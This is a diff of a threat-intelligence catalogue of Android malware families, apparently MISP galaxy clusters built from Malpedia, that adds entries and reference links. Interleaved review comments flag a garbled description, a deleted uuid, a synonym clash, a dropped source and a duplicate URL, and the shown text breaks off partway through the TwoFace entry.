@@ -423,13 +892,30 @@ "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", "value": "GhostCtrl" }, + { + "description": "Ginp is a mobile banking software targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit cards numbers by implementing overlay attacks. For this, overlay targets are for example the default SMS application. What makes Ginp a remarkable family is how its operators managed to have it remain undetected over time even and it receiving version upgrades over many years. According to ThreatFabric, Ginp has the following features:\r\n\r\nOverlaying: Dynamic (local overlays obtained from the C2)\r\nSMS harvesting: SMS listing\r\nSMS harvesting: SMS forwarding\r\nContact list collection\r\nApplication listing\r\nOverlaying: Targets list update\r\nSMS: Sending\r\nCalls: Call forwarding\r\nC2 Resilience: Auxiliary C2 list\r\nSelf-protection: Hiding the App icon\r\nSelf-protection: Preventing removal\r\nSelf-protection: Emulation-detection.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp", + "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/", + "https://www.youtube.com/watch?v=WeL_xSryj8E", + "https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/", + "https://twitter.com/ESETresearch/status/1269945115738542080", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "77e9ace0-f6e5-4d6e-965a-a653ff626be1", + "value": "Ginp" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773", - "https://www.ci-project.org/blog/2017/3/4/arid-viper", 
"https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", "https://www.clearskysec.com/glancelove/" @@ -440,6 +926,19 @@ "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", "value": "GlanceLove" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldeneagle", + "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b7c0c11d-8471-4b10-bbf2-f9c0f30bc27e", + "value": "GoldenEagle" + }, { "description": "", "meta": { @@ -472,8 +971,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff", + "https://blog.talosintelligence.com/2019/10/gustuffv2.html", "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", - "https://www.group-ib.com/media/gustuff/" + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://www.group-ib.com/media/gustuff/", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html" ], "synonyms": [], "type": [] 
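Review bot: The Ginp `description` added in the `@@ -423,13 +892,30 @@` hunk contains a garbled clause: `how its operators managed to have it remain undetected over time even and it receiving version upgrades over many years`. It presumably means `how its operators managed to keep it undetected over time even while it received version upgrades over many years`; as with the other descriptions in this update, the correction belongs in the upstream Malpedia entry rather than in this generated file.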
@@ -481,6 +983,49 @@ "uuid": "a5e2b65f-2087-465d-bf14-4acf891d5d0f", "value": "Gustuff" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hardrain", + "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf", + "https://unit42.paloaltonetworks.com/unit42-operation-blockbuster-goes-mobile/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", + "value": "HARDRAIN (Android)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw", + "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5ae490bd-84ca-434f-ab34-b87bd38e4523", + "value": "HawkShaw" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.henbox", + "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", + "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0185f9f6-018e-4eb5-a214-d810cb759a38", + "value": "HenBox" + }, { "description": "", "meta": { 
@@ -494,6 +1039,52 @@ "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", "value": "HeroRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad", + "https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users", + "https://twitter.com/LukasStefanko/status/1136568939239137280", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://securelist.com/mobile-malware-evolution-2019/96280/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "171c97ca-6b61-426d-8f72-c099528625e9", + "value": "HiddenAd" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra", + "https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ae25953d-cf7c-4304-9ea2-2ea1498ea035", + "value": "Hydra" + }, + { + "description": "Android variant of IPStorm (InterPlanetary Storm).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ipstorm", + "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf", + "https://blog.barracuda.com/2020/10/01/threat-spotlight-new-interplanetary-storm-variant-iot/" + ], + "synonyms": [ + "InterPlanetary Storm" + ], + "type": [] + }, + "uuid": "dc0c8824-64ac-4ab2-a0e4-955a14ecc59c", + "value": "IPStorm (Android)" + }, { "description": "", "meta": { 
@@ -520,11 +1111,29 @@ "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", "value": "JadeRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker", + "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451", + "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/", + "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus", + "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aa2ad8f4-3c46-4f16-994b-2a79c7481cac", + "value": "Joker" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" ], 
@@ -551,27 +1160,14 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus", - "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/" + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ksremote", + "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/" ], "synonyms": [], "type": [] }, - "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", - "value": "Lazarus (Android)" - }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf", - "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" - ], - "synonyms": [], - "type": [] - }, - "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", - "value": "Lazarus ELF Backdoor" + "uuid": "196d51bf-cf97-455d-b997-fc3e377f2188", + "value": "KSREMOTE" }, { "description": "", @@ -591,6 +1187,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", + "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" ], "synonyms": [], 
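Review bot: The cluster with uuid `fe6134aa-6588-4619-8447-57a44eb8b24c` ("Lazarus ELF Backdoor") is deleted outright in this hunk, so any MISP event or tag that already references that uuid will stop resolving after this update. The neighbouring rename is handled the right way — uuid `0caf0292-b01a-4439-b56f-c75b71900bc0` moves from "Lazarus (Android)" to the new "HARDRAIN (Android)" entry — and the same should happen here: if the ELF entry was renamed upstream (presumably to a cluster outside this view), its uuid should be carried over; if it was genuinely retired, the retired uuid should be listed in the commit description so consumers can migrate. Because the file is regenerated from the Malpedia API export, the fix belongs in the generation step rather than in a hand edit that the next sync would overwrite.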
@@ -612,13 +1209,26 @@ "uuid": "1785a4dd-4044-4405-91c2-efb722801867", "value": "LuckyCat" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mandrake", + "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0f587654-7f70-43be-9f1f-95e3a2cc2014", + "value": "Mandrake" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", - "https://www.clientsidedetection.com/marcher.html", + "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" ], "synonyms": [ 
@@ -643,6 +1253,81 @@ "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", "value": "MazarBot" }, + { + "description": "According to ThreatFabric, this is an Android banking trojan under active development as of July 2020. It is using TCP for C&C communication and targets Turkish banks.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa", + "https://twitter.com/ThreatFabric/status/1285144962695340032" + ], + "synonyms": [ + "Gorgona" + ], + "type": [] + }, + "uuid": "f155e529-dbea-4e4d-9df3-518401191c82", + "value": "Medusa (Android)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.meterpreter", + "https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe", + "https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12", + "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e1ae3e4e-5aaf-4ffe-ba2f-7871507f6d52", + "value": "Meterpreter (Android)" + }, + { + "description": "Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques as well as the ability to install an attacker-specified certificate to the trusted certificates on an infected device that would allow for man-in-the-middle (MITM) attacks.\r\nAccording to Lookout researchers, It is believed to be developed by Special Technology Center (STC), which is a Russian defense contractor sanctioned by the U.S. 
Government in connection to alleged interference in the 2016 US presidential elections.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.monokle", + "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "739d6d22-b187-4754-9098-22625ea612cc", + "value": "Monokle" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao", + "https://securelist.com/roaming-mantis-part-v/96250/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", + "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf", + "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" + ], + "synonyms": [ + "Shaoye", + "XLoader" + ], + "type": [] + }, + "uuid": "41a9408d-7020-4988-af2c-51baf4d20763", + "value": "MoqHao" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mudwater", + "https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9a8a5dd0-c86e-40d1-bc94-51070447c907", + "value": "Mudwater" + }, { "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.", "meta": { 
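Review bot: The new MoqHao entry (`apk.moqhao`) lists `"XLoader"` as a synonym, but `"XLoader"` is also the `value` of the existing `apk.xloader` cluster (visible as a context line further down in this file), so one name now resolves to two clusters with different uuids. Tooling that matches clusters by name or synonym will get an ambiguous hit; if Malpedia treats them as distinct families, qualifying the synonym (e.g. `"XLoader (MoqHao)"`) or dropping it in favour of the shared reference in `refs` would remove the collision. The repository's duplicate checks may only cover `value` and `uuid`, not synonyms — worth confirming before relying on them to catch this.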
@@ -661,6 +1346,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", + "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Android.OmniRAT", "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" ], @@ -670,6 +1356,51 @@ "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", "value": "OmniRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.oscorp", + "https://cert-agid.gov.it/news/individuato-sito-che-veicola-in-italia-un-apk-malevolo/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8d383260-102f-46da-8cc6-7659cbbd9452", + "value": "Oscorp" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.packchat", + "https://news.sophos.com/en-us/2021/01/12/new-android-spyware-targets-users-in-pakistan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b0f56103-1771-4e01-9ed7-44149e39ce93", + "value": "PackChat" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance", + "https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf", + "https://securelist.com/apt-phantomlance/96772/" + ], + "synonyms": [ + "PWNDROID1" + ], + "type": [] + }, + "uuid": "a73375a5-3384-4515-8538-b598d225586d", + "value": "PhantomLance" + }, { "description": "", "meta": { 
@@ -724,6 +1455,19 @@ "uuid": "661471fe-2cb6-4b83-9deb-43225192a849", "value": "Premier RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rana", + "https://blog.reversinglabs.com/blog/rana-android-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "65a8e406-b535-4c0a-bc6d-d1bec3c55623", + "value": "Rana" + }, { "description": "", "meta": { @@ -769,6 +1513,19 @@ "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", "value": "Retefe (Android)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.riltok", + "https://securelist.com/mobile-banker-riltok/91374/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d7b347f8-77a5-4197-b818-f3af504da2c1", + "value": "Riltok" + }, { "description": "", "meta": { @@ -783,6 +1540,19 @@ "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", "value": "Roaming Mantis" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rogue", + "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4b53480a-8006-4af7-8e4e-cc8727c62648", + "value": "Rogue" + }, { "description": "", "meta": { 
@@ -810,13 +1580,25 @@ "uuid": "a7c058cf-d482-42cf-9ea7-d5554287ea65", "value": "Sauron Locker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.silkbean", + "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "00ab3d3b-dbbf-40de-b3d8-a3466704a1a7", + "value": "SilkBean" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree", - "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", - "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" + "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" ], "synonyms": [], "type": [] @@ -845,7 +1627,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker", - "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/", + "https://labs.bitdefender.com/2020/05/android-slocker-variant-uses-coronavirus-scare-to-take-android-hostage/" ], "synonyms": [], "type": [] @@ -853,6 +1636,20 @@ "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", "value": "Slocker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsagent", + "https://blog.alyac.co.kr/2128", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ee42986c-e736-4092-a2f9-2931a02c688d", + "value": "SmsAgent" + }, { "description": "", "meta": { 
@@ -879,12 +1676,43 @@ "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", "value": "SpyBanker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spyc23", + "https://www.welivesecurity.com/2020/09/30/aptc23-group-evolves-its-android-spyware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8fb4910f-e645-4465-a202-a20835416c87", + "value": "SpyC23" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spymax", + "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", + "https://twitter.com/malwrhunterteam/status/1250412485808717826", + "https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e1dfb554-4c17-4d4c-ac48-604c48d8ab0b", + "value": "SpyMax" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan", + "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/" ], "synonyms": [], "type": [] @@ -923,7 +1751,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", - "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" + "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/", + "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [], "type": [] 
@@ -949,6 +1778,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.talent_rat", + "https://www.secureworks.com/research/threat-profiles/platinum-terminal", "https://twitter.com/LukasStefanko/status/1118066622512738304" ], "synonyms": [ @@ -985,6 +1815,19 @@ "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", "value": "TemptingCedar Spyware" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.thiefbot", + "https://business.xunison.com/thiefbot-a-new-android-banking-trojan-targeting-turkish-banking-users/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5863d2eb-920d-4263-8c4b-7a16d410ff89", + "value": "ThiefBot" + }, { "description": "", "meta": { @@ -1020,11 +1863,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", + "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html", "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/", "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", + "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", - "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html" + "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/" ], "synonyms": [], "type": [] 
@@ -1033,11 +1879,10 @@ "value": "Triada" }, { - "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", + "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout", - "https://labs.bitdefender.com/wp-content/uploads/downloads/triout-the-malware-framework-for-android-that-packs-potent-spyware-capabilities/" + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout" ], "synonyms": [], "type": [] @@ -1049,8 +1894,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001", - "https://twitter.com/illegalFawn/status/826775250583035904" + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001" ], "synonyms": [], "type": [] 
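Review bot: The Triout entry now cites only the Malpedia self-reference, while its description still opens with "Bitdefender described Triout as ..."; the Bitdefender whitepaper link that backed that attribution is the line removed in this hunk. If the original URL is dead, an archived copy or the current Bitdefender location would keep the description verifiable, whereas dropping the sole primary source leaves the claim unsupported. The second hunk on this line (`apk.unidentified_001`) likewise removes its only external reference and leaves just the self-link.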
@@ -1070,6 +1914,51 @@ "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", "value": "Unidentified APK 002" }, + { + "description": "According to Check Point Research, this is a RAT that is disguised as a set of dating apps like \"GrixyApp\", \"ZatuApp\", \"Catch&See\", including dedicated websites to conceal their malicious purpose.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_004", + "https://research.checkpoint.com/2020/hamas-android-malware-on-idf-soldiers-this-is-how-it-happened/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "55626b63-4b9a-468e-92ae-4b09b303d0ed", + "value": "Unidentified APK 004" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005", + "https://community.riskiq.com/article/6f60db72", + "https://twitter.com/voodoodahl1/status/1267571622732578816", + "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html", + "https://s.tencent.com/research/report/951.html", + "https://blog.talosintelligence.com/2020/10/donot-firestarter.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "084ebca7-91da-4d9c-8211-a18f358ac28b", + "value": "Unidentified APK 005" + }, + { + "description": "Related to the micropsia windows malware and also sometimes named micropsia.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.vamp", + "https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/" + ], + "synonyms": [ + "android.micropsia" + ], + "type": [] + }, + "uuid": "1ad5b462-1b0d-4c2f-901d-ead6c9f227bc", + "value": "vamp" + }, { "description": "", "meta": { 
@@ -1098,6 +1987,33 @@ "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46", "value": "WireX" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wolf_rat", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "994c7bb3-ba40-41bb-89b3-f05996924b10", + "value": "WolfRAT" + }, + { + "description": "According to Avira, this is a banking trojan targeting Japan.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wroba", + "https://www.avira.com/en/blog/the-android-banking-trojan-wroba-shifts-attack-from-south-korea-to-target-users-in-japan" + ], + "synonyms": [], + "type": [] + }, + "uuid": "40a5d526-ef9f-4ddf-a326-6f33dceeeebc", + "value": "Wroba" + }, { "description": "", "meta": { @@ -1118,6 +2034,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader", "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/", + "https://securelist.com/roaming-mantis-part-v/96250/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/" ], "synonyms": [], @@ -1126,6 +2043,19 @@ "uuid": "2ba6a2d9-c1c7-482a-b888-b2871c5c5e25", "value": "XLoader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xploitspy", + "https://twitter.com/malwrhunterteam/status/1249768400806653952" + ], + "synonyms": [], + "type": [] + }, + "uuid": "57600f52-b55f-49c7-9c0c-de10b2d23370", + "value": "XploitSPY" + }, { "description": "", "meta": { 
@@ -1170,8 +2100,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", + "https://securelist.com/whos-who-in-the-zoo/85394/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf", - "https://securelist.com/whos-who-in-the-zoo/85394" + "https://www.secureworks.com/research/threat-profiles/cobalt-juno", + "https://securelist.com/whos-who-in-the-zoo/85394", + "https://securelist.com/apt-trends-report-q2-2019/91897/" ], "synonyms": [], "type": [] 
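Review bot: After this hunk the ZooPark `refs` array contains both `"https://securelist.com/whos-who-in-the-zoo/85394/"` and `"https://securelist.com/whos-who-in-the-zoo/85394"`, which differ only in the trailing slash, so the same article is listed twice. The removed no-slash line is re-added two lines lower, which suggests the exporter compares references as raw strings; normalising URLs (trailing slash, scheme, tracking parameters) before de-duplicating would avoid this, and the `time_continue=1333` parameter on the TwoFace YouTube link elsewhere in this diff is another case where that normalisation would help.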
@@ -1197,17 +2130,26 @@ "value": "Ztorg" }, { - "description": "", + "description": "According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.\r\n\r\nThe secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader that will be in turn used to decrypt the embedded TwoFace payload. 
